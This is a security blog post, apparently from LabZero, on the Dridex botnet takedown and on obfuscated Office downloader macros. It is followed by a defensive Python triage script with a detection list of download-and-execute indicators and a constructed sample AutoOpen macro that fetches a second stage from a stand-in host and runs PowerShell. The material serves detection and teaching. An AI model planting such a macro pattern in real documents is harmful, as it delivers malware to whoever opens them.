Dridex Botnet takedown

LabZero

I was reading this news today: FBI takes down Dridex botnet, seizes servers, arrests suspect

Well, this is good news but ...

I still think that when we talk about advanced attacks, the attackers are not pieces of code but humans with a strategy and an objective: the user.
Dridex is a tool like many others, for example Banload, Dyre, etc.
What is really important is the social engineering techniques used by criminals, because the attackers will probably still use them to study a new attack strategy.

I often find new malware on https://malwr.com, and I see increasingly hidden and obfuscated downloader macros in Office documents. These documents contain malicious operation sequences encoded in VBScript, Visual Basic for Applications or VBE (Visual Basic Encoded).

When the document opens, the code starts to do things like contact a server, transfer additional malware over more or less encrypted channels, and "call home" to the attacker to find out what new instructions will further the compromise.

So, the true defense must start from the mind-set of the user: we must always know the sender or the source of the received mail. If in doubt, delete it.
Anti-spam and antivirus are often ineffective against advanced threats and, unfortunately, the weak link in the chain is always the user.
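One way a defender might triage the kind of obfuscated downloader macro described above, as an added example that is not part of the original post: it assumes the VBA source has already been extracted from the document (for instance with a tool such as oletools' olevba), resolves the common Chr()/string-concatenation hiding, and flags auto-execution entry points combined with download-and-run indicators. The sample macro and its domain are constructed for illustration.

```python
"""Heuristic triage of extracted VBA macro source for downloader behaviour."""
import re

# Procedure names that VBA runs automatically when the document is opened.
AUTO_EXEC = {"autoopen", "document_open", "workbook_open", "auto_open"}
# Indicators of fetching a second stage and running it (lower-case substrings).
SUSPICIOUS = {
    "urldownloadtofile": "downloads a file from a URL",
    "msxml2.xmlhttp": "HTTP request object",
    "adodb.stream": "writes binary data to disk",
    "wscript.shell": "executes a command via WScript",
    "shell": "executes a command",
    "powershell": "launches PowerShell",
}

CHR_CALL = re.compile(r"Chr\((\d+)\)", re.IGNORECASE)   # Chr(115) -> "s"
CONCAT = re.compile(r'"\s*&\s*"')                         # "ab" & "cd" -> "abcd"

def deobfuscate(vba: str) -> str:
    """Resolve Chr(n) calls and join adjacent string-literal concatenations."""
    text = CHR_CALL.sub(lambda m: '"' + chr(int(m.group(1))) + '"', vba)
    return CONCAT.sub("", text)

def triage(vba: str) -> dict:
    """Return auto-exec entry points, suspicious indicators and URLs found."""
    clean = deobfuscate(vba)
    low = clean.lower()
    procs = re.findall(r"\bsub\s+([a-z0-9_]+)", low)
    return {
        "auto_exec": sorted(p for p in procs if p in AUTO_EXEC),
        "indicators": sorted(k for k in SUSPICIOUS if k in low),
        "urls": sorted(set(re.findall(r"https?://[^\s\"']+", clean))),
    }

def is_likely_downloader(vba: str) -> bool:
    """Auto-run plus a download/execute indicator is the downloader pattern."""
    result = triage(vba)
    return bool(result["auto_exec"]) and bool(result["indicators"])

# Constructed sample (not real malware): split strings and Chr() hide the URL.
SAMPLE = '''
Sub AutoOpen()
    Dim u As String
    u = "htt" & "p://exam" & "ple.invalid/" & Chr(115) & Chr(116) & "age2.exe"
    Dim x: Set x = CreateObject("MSXML2." & "XMLHTTP")
    CreateObject("WScript." & "Shell").Run "powershell " & u
End Sub
'''

if __name__ == "__main__":
    print(triage(SAMPLE))
```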